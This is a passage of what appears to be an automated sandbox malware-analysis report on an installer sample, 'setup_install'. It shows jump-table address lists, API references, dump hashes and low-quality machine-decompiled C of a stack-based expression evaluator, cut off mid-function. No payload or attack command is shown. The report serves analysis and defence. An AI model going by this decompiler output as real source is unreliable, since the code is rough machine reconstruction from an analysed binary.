                                                                                                                            0x0040dba7
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040dbc0
                                                                                                                            0x0040dbc2
                                                                                                                            0x0040dbc4
                                                                                                                            0x0040dbc4
                                                                                                                            0x0040dbc7
                                                                                                                            0x0040dbcd
                                                                                                                            0x0040dbd0
                                                                                                                            0x0040dbd2
                                                                                                                            0x0040dbd5
                                                                                                                            0x0040dbd7
                                                                                                                            0x0040dbdb
                                                                                                                            0x0040dbde
                                                                                                                            0x0040dbe4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040dbf0
                                                                                                                            0x0040dbf3
                                                                                                                            0x0040dbf5
                                                                                                                            0x0040dbf7
                                                                                                                            0x0040dbfd
                                                                                                                            0x0040dc10
                                                                                                                            0x0040dc10
                                                                                                                            0x0040dc13
                                                                                                                            0x0040dc19
                                                                                                                            0x0040dc1c
                                                                                                                            0x0040dc1e
                                                                                                                            0x0040dc21
                                                                                                                            0x0040dc23
                                                                                                                            0x0040dc27
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040dc30
                                                                                                                            0x0040dc32
                                                                                                                            0x0040dc34
                                                                                                                            0x0040dc34
                                                                                                                            0x0040dc37
                                                                                                                            0x0040dc3d
                                                                                                                            0x0040dc40
                                                                                                                            0x0040dc42
                                                                                                                            0x0040dc45
                                                                                                                            0x0040dc47
                                                                                                                            0x0040dc4e
                                                                                                                            0x0040dc50
                                                                                                                            0x0040dc53
                                                                                                                            0x0040dc56
                                                                                                                            0x0040dc5d
                                                                                                                            0x0040dc5d
                                                                                                                            0x0040dc5f
                                                                                                                            0x0040dc61
                                                                                                                            0x0040dc63
                                                                                                                            0x0040dc63
                                                                                                                            0x0040dc66
                                                                                                                            0x0040dc6c
                                                                                                                            0x0040dc6f
                                                                                                                            0x0040dc71
                                                                                                                            0x0040dc74
                                                                                                                            0x0040dc76
                                                                                                                            0x0040dc7a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040dc81
                                                                                                                            0x0040dc83
                                                                                                                            0x0040dc85
                                                                                                                            0x0040dc85
                                                                                                                            0x0040dc88
                                                                                                                            0x0040dc8e
                                                                                                                            0x0040dc91
                                                                                                                            0x0040dc93
                                                                                                                            0x0040dc96
                                                                                                                            0x0040dc98
                                                                                                                            0x0040dc9c
                                                                                                                            0x0040dc9e
                                                                                                                            0x0040dca0
                                                                                                                            0x0040dca0
                                                                                                                            0x0040dca3
                                                                                                                            0x0040dca9
                                                                                                                            0x0040dcac
                                                                                                                            0x0040dcae
                                                                                                                            0x0040dcb1
                                                                                                                            0x0040dcb3
                                                                                                                            0x0040dcba
                                                                                                                            0x0040dcce
                                                                                                                            0x0040dcd0
                                                                                                                            0x0040dcd2
                                                                                                                            0x0040dcd2
                                                                                                                            0x0040d997
                                                                                                                            0x0040d997
                                                                                                                            0x0040d99a
                                                                                                                            0x0040d99a
                                                                                                                            0x0040d9a4
                                                                                                                            0x00000000
                                                                                                                            0x0040d9aa
                                                                                                                            0x0040d9aa
                                                                                                                            0x0040d9ad
                                                                                                                            0x0040d9af
                                                                                                                            0x0040d9b1
                                                                                                                            0x0040d9b1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040dce0
                                                                                                                            0x0040dce2
                                                                                                                            0x0040dce4
                                                                                                                            0x0040dce4
                                                                                                                            0x0040dce7
                                                                                                                            0x0040dced
                                                                                                                            0x0040dcf0
                                                                                                                            0x0040dcf2
                                                                                                                            0x0040dcf5
                                                                                                                            0x0040dcf7
                                                                                                                            0x0040dcfb
                                                                                                                            0x0040dcfe
                                                                                                                            0x0040dd00
                                                                                                                            0x0040dd06
                                                                                                                            0x0040dd10
                                                                                                                            0x0040dd10
                                                                                                                            0x0040dd13
                                                                                                                            0x0040dd19
                                                                                                                            0x0040dd1c
                                                                                                                            0x0040dd1e
                                                                                                                            0x0040dd21
                                                                                                                            0x0040dd23
                                                                                                                            0x0040dd2a
                                                                                                                            0x0040dd36
                                                                                                                            0x0040dd38
                                                                                                                            0x0040dd3a
                                                                                                                            0x0040dd3a
                                                                                                                            0x0040dd3c
                                                                                                                            0x0040dd3f
                                                                                                                            0x0040dd46
                                                                                                                            0x0040dd50
                                                                                                                            0x0040dd56
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040dd60
                                                                                                                            0x0040dd62
                                                                                                                            0x0040dd64
                                                                                                                            0x0040dd64
                                                                                                                            0x0040dd67
                                                                                                                            0x0040dd6d
                                                                                                                            0x0040dd70
                                                                                                                            0x0040dd72
                                                                                                                            0x0040dd75
                                                                                                                            0x0040dd77
                                                                                                                            0x0040dd7e
                                                                                                                            0x0040dd8a
                                                                                                                            0x0040dd8c
                                                                                                                            0x0040dd8e
                                                                                                                            0x0040dd8e
                                                                                                                            0x0040dd90
                                                                                                                            0x0040dd9a
                                                                                                                            0x0040dda0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ddb0
                                                                                                                            0x0040ddb2
                                                                                                                            0x0040ddb4
                                                                                                                            0x0040ddb4
                                                                                                                            0x0040ddb7
                                                                                                                            0x0040ddbd
                                                                                                                            0x0040ddc0
                                                                                                                            0x0040ddc2
                                                                                                                            0x0040ddc5
                                                                                                                            0x0040ddc7
                                                                                                                            0x0040ddcb
                                                                                                                            0x0040ddcd
                                                                                                                            0x0040ddd0
                                                                                                                            0x0040ddd0
                                                                                                                            0x0040ddd3
                                                                                                                            0x0040ddd9
                                                                                                                            0x0040dddc
                                                                                                                            0x0040ddde
                                                                                                                            0x0040dde1
                                                                                                                            0x0040dde3
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040dec0
                                                                                                                            0x0040dec2
                                                                                                                            0x0040dec4
                                                                                                                            0x0040dec4
                                                                                                                            0x0040dec7
                                                                                                                            0x0040decd
                                                                                                                            0x0040ded0
                                                                                                                            0x0040ded2
                                                                                                                            0x0040ded5
                                                                                                                            0x0040ded7
                                                                                                                            0x0040dedb
                                                                                                                            0x0040dedd
                                                                                                                            0x0040dee0
                                                                                                                            0x0040dee0
                                                                                                                            0x0040dee3
                                                                                                                            0x0040dee9
                                                                                                                            0x0040deec
                                                                                                                            0x0040deee
                                                                                                                            0x0040def1
                                                                                                                            0x0040def3
                                                                                                                            0x0040defa
                                                                                                                            0x0040df0e
                                                                                                                            0x0040df10
                                                                                                                            0x0040df12
                                                                                                                            0x0040df12
                                                                                                                            0x0040dde7
                                                                                                                            0x0040dde7
                                                                                                                            0x0040ddea
                                                                                                                            0x0040ddf4
                                                                                                                            0x00000000
                                                                                                                            0x0040ddfa
                                                                                                                            0x0040ddfa
                                                                                                                            0x0040ddfd
                                                                                                                            0x0040ddff
                                                                                                                            0x0040de01
                                                                                                                            0x0040de01
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040de10
                                                                                                                            0x0040de12
                                                                                                                            0x0040de14
                                                                                                                            0x0040de14
                                                                                                                            0x0040de17
                                                                                                                            0x0040de1d
                                                                                                                            0x0040de20
                                                                                                                            0x0040de22
                                                                                                                            0x0040de25
                                                                                                                            0x0040de27
                                                                                                                            0x0040de2e
                                                                                                                            0x0040de30
                                                                                                                            0x0040de33
                                                                                                                            0x0040de36
                                                                                                                            0x0040de3d
                                                                                                                            0x0040de3d
                                                                                                                            0x0040de3f
                                                                                                                            0x0040de41
                                                                                                                            0x0040de43
                                                                                                                            0x0040de43
                                                                                                                            0x0040de46
                                                                                                                            0x0040de4c
                                                                                                                            0x0040de4f
                                                                                                                            0x0040de51
                                                                                                                            0x0040de54
                                                                                                                            0x0040de56
                                                                                                                            0x0040de5a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040d890
                                                                                                                            0x0040d892
                                                                                                                            0x0040d894
                                                                                                                            0x0040d894
                                                                                                                            0x0040d897
                                                                                                                            0x0040d89d
                                                                                                                            0x0040d8a0
                                                                                                                            0x0040d8a2
                                                                                                                            0x0040d8a5
                                                                                                                            0x0040d8a7
                                                                                                                            0x0040d8ab
                                                                                                                            0x0040d8ae
                                                                                                                            0x0040d8b1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040de61
                                                                                                                            0x0040de63
                                                                                                                            0x0040de65
                                                                                                                            0x0040de65
                                                                                                                            0x0040de68
                                                                                                                            0x0040de6e
                                                                                                                            0x0040de71
                                                                                                                            0x0040de73
                                                                                                                            0x0040de76
                                                                                                                            0x0040de78
                                                                                                                            0x0040de7c
                                                                                                                            0x0040de7e
                                                                                                                            0x0040de80
                                                                                                                            0x0040de80
                                                                                                                            0x0040de83
                                                                                                                            0x0040de89
                                                                                                                            0x0040de8c
                                                                                                                            0x0040de8e
                                                                                                                            0x0040de91
                                                                                                                            0x0040de93
                                                                                                                            0x0040de97
                                                                                                                            0x0040de9a
                                                                                                                            0x0040dea4
                                                                                                                            0x00000000
                                                                                                                            0x0040deaa
                                                                                                                            0x0040deaa
                                                                                                                            0x0040deaf
                                                                                                                            0x0040deb1
                                                                                                                            0x0040deb3
                                                                                                                            0x0040deb3
                                                                                                                            0x0040d7d2
                                                                                                                            0x0040d7d5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040d7c6
                                                                                                                            0x0040d7c0
                                                                                                                            0x0040d7bc
                                                                                                                            0x0040d7b3
                                                                                                                            0x00000000
                                                                                                                            0x0040d7d7
                                                                                                                            0x0040d7d7
                                                                                                                            0x0040d7da
                                                                                                                            0x0040d7dd
                                                                                                                            0x0040d7dd
                                                                                                                            0x0040d7e3
                                                                                                                            0x0040d7e6
                                                                                                                            0x0040d7e9
                                                                                                                            0x0040d7ef
                                                                                                                            0x0040d7a0
                                                                                                                            0x00000000
                                                                                                                            0x0040d796
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • abort.MSVCRT ref: 004986E1
                                                                                                                            • abort.MSVCRT ref: 004986E6
                                                                                                                            • abort.MSVCRT ref: 004986EB
                                                                                                                            • abort.MSVCRT ref: 004986F0
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986F5
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FA
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FF
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498704
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498709
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 0049870E
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498713
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498718
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498720
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498725
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: abort
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4206212132-0
                                                                                                                            • Opcode ID: 7ec91704c6bde02cf5bdc6d4e3190639ea25b17b78995713599b722680ce58ce
                                                                                                                            • Instruction ID: 9a183b2e66c350de5dd1cac79a17f5e0bcf7914487b5c38fe0054ea2c37d6503
                                                                                                                            • Opcode Fuzzy Hash: 7ec91704c6bde02cf5bdc6d4e3190639ea25b17b78995713599b722680ce58ce
                                                                                                                            • Instruction Fuzzy Hash: B6B1E376E046249FC7048F68C481799BBF1BB45354F09817BEC99AB382C37DE94A9BC4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040EA90 Relevance: 21.1, APIs: 14, Instructions: 133COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 26%
                                                                                                                            			E0040EA90(CHAR* __ebx, void* __edx, char _a1, signed int _a20, intOrPtr _a24, signed int _a28, signed int _a44) {
				char _v1;
				void* _v16;
				char* _v40;
				struct HINSTANCE__* _t189;
				struct HINSTANCE__* _t192;
				_Unknown_base(*)()* _t193;
				CHAR* _t195;
				struct HINSTANCE__* _t197;
				_Unknown_base(*)()* _t203;
				void* _t208;
				char** _t209;
				char** _t210;
				struct HINSTANCE__** _t212;
				struct HINSTANCE__** _t213;

				L0:
				while(1) {
					L0:
					_t195 = __ebx;
					if(_a20 <= 1) {
						break;
					}
					L92:
					__ebp = __eax - 2;
					__edx = __edx - 0x1a;
					if(__dl > 0x14) {
						L96:
						abort();
						goto L97;
					} else {
						L93:
						__edx = __dl & 0x000000ff;
						switch( *((intOrPtr*)((__dl & 0x000000ff) * 4 +  &M004A4DDC))) {
							case 0:
								L111:
								__edi = __edi & __ecx;
								__esi = __ebx;
								goto L10;
							case 1:
								L112:
								__eax = __edi;
								__esi = __ebx;
								asm("cdq");
								_t169 = __eax % __ecx;
								__eax = __eax / __ecx;
								__edx = _t169;
								__edi = __eax;
								goto L10;
							case 2:
								L113:
								__edi = __edi - __ecx;
								__esi = __ebx;
								goto L10;
							case 3:
								L114:
								__eax = __edi;
								__edx = 0;
								__esi = __ebx;
								_t173 = __eax % __ecx;
								__eax = __eax / __ecx;
								__edx = _t173;
								__edi = _t173;
								goto L10;
							case 4:
								L115:
								__edi = __edi * __ecx;
								__esi = __ebx;
								goto L10;
							case 5:
								goto L96;
							case 6:
								L116:
								__edi = __edi | __ecx;
								__esi = __ebx;
								goto L10;
							case 7:
								L117:
								__edi = __edi + __ecx;
								__esi = __ebx;
								goto L10;
							case 8:
								L118:
								__edi = __edi << __cl;
								__esi = __ebx;
								goto L10;
							case 9:
								L119:
								__edi = __edi >> __cl;
								__esi = __ebx;
								goto L10;
							case 0xa:
								L120:
								__edi = __edi >> __cl;
								__esi = __ebx;
								goto L10;
							case 0xb:
								L121:
								__edi = __edi ^ __ecx;
								__esi = __ebx;
								goto L10;
							case 0xc:
								L122:
								__eax = 0;
								__eflags = __edi - __ecx;
								__esi = __ebx;
								__eax = 0 | __eflags == 0x00000000;
								__edi = __eflags == 0;
								goto L10;
							case 0xd:
								L123:
								__eax = 0;
								__eflags = __edi - __ecx;
								__esi = __ebx;
								__eax = 0 | __eflags >= 0x00000000;
								__edi = __eflags >= 0;
								goto L10;
							case 0xe:
								L124:
								__eax = 0;
								__eflags = __edi - __ecx;
								__esi = __ebx;
								__eax = 0 | __eflags > 0x00000000;
								__edi = __eflags > 0;
								goto L10;
							case 0xf:
								L125:
								__eax = 0;
								__eflags = __edi - __ecx;
								__esi = __ebx;
								__eax = 0 | __eflags <= 0x00000000;
								__edi = __eflags <= 0;
								goto L10;
							case 0x10:
								L126:
								__eax = 0;
								__eflags = __edi - __ecx;
								__esi = __ebx;
								__eax = 0 | __eflags < 0x00000000;
								__edi = __eflags < 0;
								goto L10;
							case 0x11:
								L127:
								__eax = 0;
								__eflags = __edi - __ecx;
								__esi = __ebx;
								__eax = 0 | __eflags != 0x00000000;
								__edi = __eflags != 0;
								while(1) {
									L10:
									__eflags = __ebp - 0x3f;
									if(__ebp > 0x3f) {
										goto L129;
									}
									L11:
									__eax =  &_a1;
									 *(__esp + 0x30 + __ebp * 4) = __edi;
									_a20 =  &_a1;
									while(1) {
										L12:
										__eflags = _a24 - __esi;
										if(_a24 <= __esi) {
											break;
										}
										L7:
										__eax =  *__esi & 0x000000ff;
										_t6 = __esi + 1; // 0x1
										__ebx = _t6;
										__ecx = __eax - 3;
										__edx = __eax;
										__eflags = __cl - 0xee;
										if(__cl > 0xee) {
											goto L96;
										} else {
											L8:
											__ecx = __cl & 0x000000ff;
											switch( *((intOrPtr*)(__ecx * 4 +  &M004A4A20))) {
												case 0:
													L9:
													__ebp = _a20;
													__edi =  *(__esi + 1);
													__esi = __esi + 5;
													__eflags = __esi;
													goto L10;
												case 1:
													goto L96;
												case 2:
													L22:
													__eax = _a20;
													__eflags = __eax;
													if(__eax == 0) {
														goto L129;
													} else {
														L23:
														__ebp = __eax;
														__ebp =  &_v1;
														__edi =  *(__esp + 0x30 + __ebp * 4);
														__eflags = __dl - 0x1f;
														if(__eflags == 0) {
															L110:
															__edi =  ~__edi;
															__esi = __ebx;
														} else {
															L24:
															if(__eflags <= 0) {
																L97:
																__eflags = __dl - 6;
																if(__dl != 6) {
																	L99:
																	__eflags = __dl - 0x19;
																	if(__dl != 0x19) {
																		goto L96;
																	} else {
																		L100:
																		__eax = __edi;
																		__esi = __ebx;
																		__eax = __edi >> 0x1f;
																		__edi = __edi ^ __eax;
																		__edi = __edi - __eax;
																	}
																} else {
																	L98:
																	__edi =  *__edi;
																	__esi = __ebx;
																}
															} else {
																L25:
																__eflags = __dl - 0x23;
																if(__dl == 0x23) {
																	L102:
																	__esi = 0;
																	__ecx = 0;
																	__eflags = 0;
																	do {
																		L103:
																		__ebx = __ebx + 1;
																		__edx =  *(__ebx - 1) & 0x000000ff;
																		 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
																		__eax = ( *(__ebx - 1) & 0x7f) << __cl;
																		__ecx = __ecx + 7;
																		__esi = __esi | ( *(__ebx - 1) & 0x7f) << __cl;
																		__eflags = __dl;
																	} while (__dl < 0);
																	__edi = __edi + __esi;
																	__esi = __ebx;
																} else {
																	L26:
																	__eflags = __dl - 0x94;
																	if(__dl != 0x94) {
																		L95:
																		__eflags = __dl - 0x20;
																		if(__dl == 0x20) {
																			L109:
																			__edi =  !__edi;
																			__esi = __ebx;
																		} else {
																			goto L96;
																		}
																	} else {
																		L27:
																		__eax =  *(__esi + 1) & 0x000000ff;
																		__edx = __esi + 2;
																		__eflags = __al - 2;
																		if(__eflags == 0) {
																			L128:
																			__edi =  *__edi & 0x0000ffff;
																			__esi = __edx;
																		} else {
																			L28:
																			if(__eflags <= 0) {
																				L107:
																				__eflags = __al - 1;
																				if(__al != 1) {
																					goto L96;
																				} else {
																					L108:
																					__edi =  *__edi & 0x000000ff;
																					__esi = __edx;
																				}
																			} else {
																				L29:
																				__eflags = __al - 4;
																				if(__al == 4) {
																					L31:
																					__edi =  *__edi;
																					__esi = __edx;
																				} else {
																					L30:
																					__eflags = __al - 8;
																					if(__al != 8) {
																						goto L96;
																					} else {
																						goto L31;
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
														goto L10;
													}
													goto L142;
												case 3:
													L21:
													__edi =  *(__esi + 1) & 0x000000ff;
													__ebp = _a20;
													__esi = __esi + 2;
													goto L10;
												case 4:
													L20:
													__edi =  *(__esi + 1);
													__ebp = _a20;
													__esi = __esi + 2;
													goto L10;
												case 5:
													L19:
													__edi =  *(__esi + 1) & 0x0000ffff;
													__ebp = _a20;
													__esi = __esi + 3;
													goto L10;
												case 6:
													L18:
													__edi =  *(__esi + 1);
													__ebp = _a20;
													__esi = __esi + 3;
													goto L10;
												case 7:
													L16:
													__edi =  *(__esi + 1);
													__ebp = _a20;
													__esi = __esi + 9;
													goto L10;
												case 8:
													L68:
													__esi = __ebx;
													__edi = 0;
													__ecx = 0;
													__eflags = 0;
													do {
														L69:
														__esi = __esi + 1;
														__edx =  *(__esi - 1) & 0x000000ff;
														 *(__esi - 1) & 0x000000ff =  *(__esi - 1) & 0x7f;
														__eax = ( *(__esi - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__edi = __edi | ( *(__esi - 1) & 0x7f) << __cl;
														__eflags = __dl;
													} while (__dl < 0);
													__ebp = _a20;
													goto L10;
												case 9:
													L63:
													__edi = 0;
													__ecx = 0;
													__eflags = 0;
													do {
														L64:
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														__edx = __edx & 0x0000007f;
														__eax = (__edx & 0x0000007f) << __cl;
														__ecx = __ecx + 7;
														__edi = __edi | (__edx & 0x0000007f) << __cl;
														__eflags = __dl;
													} while (__dl < 0);
													__eflags = __ecx - 0x1f;
													if(__ecx > 0x1f) {
														goto L94;
													} else {
														L66:
														__edx = __edx & 0x00000040;
														__eflags = __edx;
														if(__edx == 0) {
															goto L94;
														} else {
															L67:
															__eax = 1;
															__ebp = _a20;
															__esi = __ebx;
															1 << __cl =  ~(1 << __cl);
															__edi = __edi |  ~(1 << __cl);
														}
													}
													goto L10;
												case 0xa:
													L61:
													__ebp = _a20;
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L129;
													} else {
														L62:
														__edi =  *(__esp + 0x2c + __ebp * 4);
														__esi = __ebx;
														goto L10;
													}
													goto L142;
												case 0xb:
													L59:
													__eax = _a20;
													__eflags = __eax;
													if(__eax == 0) {
														goto L129;
													} else {
														L60:
														__eax = __eax - 1;
														__esi = __ebx;
														_a20 = __eax;
														goto L12;
													}
													goto L142;
												case 0xc:
													L57:
													__ebp = _a20;
													__eflags = __ebp - 1;
													if(__ebp <= 1) {
														goto L129;
													} else {
														L58:
														__edi =  *(__esp + 0x28 + __ebp * 4);
														__esi = __ebx;
														goto L10;
													}
													goto L142;
												case 0xd:
													L55:
													__ebp = _a20;
													__ecx =  *(__esi + 1) & 0x000000ff;
													__edx = __esi + 2;
													__eax =  &_v1;
													__eflags = __ecx - __eax;
													if(__ecx >= __eax) {
														goto L129;
													} else {
														L56:
														__eax = __eax - __ecx;
														__esi = __edx;
														__edi =  *(__esp + 0x30 + __eax * 4);
														goto L10;
													}
													goto L142;
												case 0xe:
													L90:
													__eax = _a20;
													__eflags = __eax - 1;
													if(__eax <= 1) {
														goto L129;
													} else {
														L91:
														__edx = __eax - 1;
														__eax = __eax - 2;
														__esi =  *(__esp + 0x30 + __eax * 4);
														__ecx =  *(__esp + 0x30 + __edx * 4);
														 *(__esp + 0x30 + __edx * 4) =  *(__esp + 0x30 + __eax * 4);
														__esi = __ebx;
														 *(__esp + 0x30 + __eax * 4) =  *(__esp + 0x30 + __edx * 4);
														goto L12;
													}
													goto L142;
												case 0xf:
													L88:
													__eax = _a20;
													__eflags = __eax - 2;
													if(__eax <= 2) {
														goto L129;
													} else {
														L89:
														__ecx = __eax - 1;
														__edx = __eax - 2;
														__eax = __eax - 3;
														__esi =  *(__esp + 0x30 + __ecx * 4);
														__ebp =  *(__esp + 0x30 + __edx * 4);
														__edi =  *(__esp + 0x30 + __eax * 4);
														 *(__esp + 0x30 + __ecx * 4) = __ebp;
														 *(__esp + 0x30 + __edx * 4) = __edi;
														 *(__esp + 0x30 + __eax * 4) =  *(__esp + 0x30 + __ecx * 4);
														__esi = __ebx;
														goto L12;
													}
													goto L142;
												case 0x10:
													goto L0;
												case 0x11:
													L83:
													__eax = _a20;
													__eflags = __eax;
													if(__eax == 0) {
														goto L129;
													} else {
														L84:
														__eax = __eax - 1;
														__edi = __eax;
														_a20 = __eax;
														__eax = __esi + 3;
														__edx =  *(__esp + 0x30 + __edi * 4);
														__eflags =  *(__esp + 0x30 + __edi * 4);
														if( *(__esp + 0x30 + __edi * 4) == 0) {
															__esi = __eax;
														} else {
															__esi =  *(__esi + 1);
															__esi = __esi + __eax;
														}
														goto L12;
													}
													goto L142;
												case 0x12:
													L87:
													__eax =  *(__esi + 1);
													__esi = __esi +  *(__esi + 1) + 3;
													goto L12;
												case 0x13:
													L86:
													__edi = __eax - 0x30;
													__ebp = _a20;
													__esi = __ebx;
													goto L10;
												case 0x14:
													L50:
													__eax = __eax - 0x50;
													__eflags = __eax - 0x11;
													if(__eax > 0x11) {
														goto L129;
													} else {
														L51:
														__esi = _a28;
														__edx =  *(__eax + 0x4e53f8) & 0x000000ff;
														__edi =  *(__esi + __eax * 4);
														__eflags =  *(__esi + 0x63) & 0x00000040;
														if(( *(__esi + 0x63) & 0x00000040) == 0) {
															L53:
															__eflags = __dl - 4;
															if(__dl == 4) {
																goto L39;
															} else {
																L54:
																goto L129;
															}
														} else {
															L52:
															__eflags =  *((char*)(__esi + __eax + 0x6c));
															if( *((char*)(__esi + __eax + 0x6c)) != 0) {
																goto L94;
															} else {
																goto L53;
															}
														}
													}
													goto L142;
												case 0x15:
													L40:
													__ebp = 0;
													__ecx = 0;
													__eflags = 0;
													__esi = __eax;
													do {
														L41:
														__ebx = __ebx + 1;
														__eax =  *(__ebx - 1) & 0x000000ff;
														__eax = __eax & 0x0000007f;
														__edx = (__eax & 0x0000007f) << __cl;
														__ecx = __ecx + 7;
														__ebp = __ebp | (__eax & 0x0000007f) << __cl;
														__eflags = __al;
													} while (__al < 0);
													__edi = __eax;
													__eax = __esi;
													__esi = __edi;
													__eflags = __ecx - 0x1f;
													if(__ecx <= 0x1f) {
														__esi = __esi & 0x00000040;
														__eflags = __esi;
														if(__esi != 0) {
															1 = 1 << __cl;
															__edx =  ~(1 << __cl);
															__ebp = __ebp |  ~(1 << __cl);
														}
													}
													__eax = __eax - 0x70;
													__eflags = __eax - 0x11;
													if(__eax > 0x11) {
														goto L129;
													} else {
														L45:
														__esi = _a28;
														__edx =  *(__eax + 0x4e53f8) & 0x000000ff;
														__edi =  *(__esi + __eax * 4);
														__eflags =  *(__esi + 0x63) & 0x00000040;
														if(( *(__esi + 0x63) & 0x00000040) == 0) {
															L47:
															__eflags = __dl - 4;
															if(__dl != 4) {
																goto L129;
															} else {
																L48:
																__edi =  *__edi;
																goto L49;
															}
														} else {
															L46:
															__eflags =  *((char*)(__esi + __eax + 0x6c));
															if( *((char*)(__esi + __eax + 0x6c)) != 0) {
																L49:
																__edi = __edi + __ebp;
																__esi = __ebx;
																__ebp = _a20;
																goto L10;
															} else {
																goto L47;
															}
														}
													}
													goto L142;
												case 0x16:
													L33:
													__esi = 0;
													__ecx = 0;
													__eflags = 0;
													do {
														L34:
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
														__eax = ( *(__ebx - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__esi = __esi | ( *(__ebx - 1) & 0x7f) << __cl;
														__eflags = __dl;
													} while (__dl < 0);
													__eflags = __esi - 0x11;
													if(__esi > 0x11) {
														goto L129;
													} else {
														L36:
														__ecx = _a28;
														__eax =  *(__esi + 0x4e53f8) & 0x000000ff;
														__edi =  *(__ecx + __esi * 4);
														__eflags =  *(__ecx + 0x63) & 0x00000040;
														if(( *(__ecx + 0x63) & 0x00000040) == 0) {
															L38:
															__eflags = __al - 4;
															if(__al != 4) {
																goto L129;
															} else {
																L39:
																__edi =  *__edi;
																__ebp = _a20;
																__esi = __ebx;
																goto L10;
															}
														} else {
															L37:
															__eflags =  *((char*)(__ecx + __esi + 0x6c));
															if( *((char*)(__ecx + __esi + 0x6c)) != 0) {
																L94:
																__ebp = _a20;
																__esi = __ebx;
																goto L10;
															} else {
																goto L38;
															}
														}
													}
													goto L142;
												case 0x17:
													L71:
													__esi = 0;
													__ecx = 0;
													__eflags = 0;
													do {
														L72:
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
														__eax = ( *(__ebx - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__esi = __esi | ( *(__ebx - 1) & 0x7f) << __cl;
														__eflags = __dl;
													} while (__dl < 0);
													__edi = 0;
													__ecx = 0;
													__eflags = 0;
													do {
														L74:
														__ebx = __ebx + 1;
														__eax =  *(__ebx - 1) & 0x000000ff;
														 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
														__edx = ( *(__ebx - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__edi = __edi | ( *(__ebx - 1) & 0x7f) << __cl;
														__eflags = __al;
													} while (__al < 0);
													__eflags = __ecx - 0x1f;
													if(__ecx <= 0x1f) {
														__eflags = __al & 0x00000040;
														if((__al & 0x00000040) != 0) {
															1 = 1 << __cl;
															__eax =  ~(1 << __cl);
															__edi = __edi |  ~(1 << __cl);
														}
													}
													__eflags = __esi - 0x11;
													if(__esi > 0x11) {
														goto L129;
													} else {
														L78:
														__ecx = _a28;
														__edx =  *(__esi + 0x4e53f8) & 0x000000ff;
														__eax =  *(__ecx + __esi * 4);
														__eflags =  *(__ecx + 0x63) & 0x00000040;
														if(( *(__ecx + 0x63) & 0x00000040) == 0) {
															L80:
															__eflags = __dl - 4;
															if(__dl != 4) {
																goto L129;
															} else {
																L81:
																__eax =  *__eax;
																goto L82;
															}
														} else {
															L79:
															__eflags =  *((char*)(__ecx + __esi + 0x6c));
															if( *((char*)(__ecx + __esi + 0x6c)) != 0) {
																L82:
																__edi = __edi + __eax;
																__ebp = _a20;
																__esi = __ebx;
																goto L10;
															} else {
																goto L80;
															}
														}
													}
													goto L142;
												case 0x18:
